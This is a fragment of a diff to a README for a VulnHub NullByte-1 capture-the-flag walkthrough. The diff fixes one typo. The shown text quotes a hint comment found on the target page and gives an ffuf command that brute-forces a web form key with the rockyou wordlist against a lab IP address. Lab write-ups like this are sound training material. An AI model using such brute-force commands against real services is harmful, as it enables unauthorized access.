Git-K3rnel/VulnHub/NULLBYTE-1/README.md

 <!-- this form isn't connected to mysql, password ain't that complex --!>
 ```

-so we can some how brute force the password here, i used `ffuf` for doing this, but you can also use a custome python script or some other tools :
+so we can somehow brute force the password here, i used `ffuf` for doing this, but you can also use a custome python script or some other tools :

 ```text
 root@kali: ffuf -w /usr/share/wordlists/rockyou.txt  -H "Content-Type: application/x-www-form-urlencoded" -X POST -d "key=FUZZ" -u http://192.168.127.232/kzMb5nVYJw/index.php -fw 19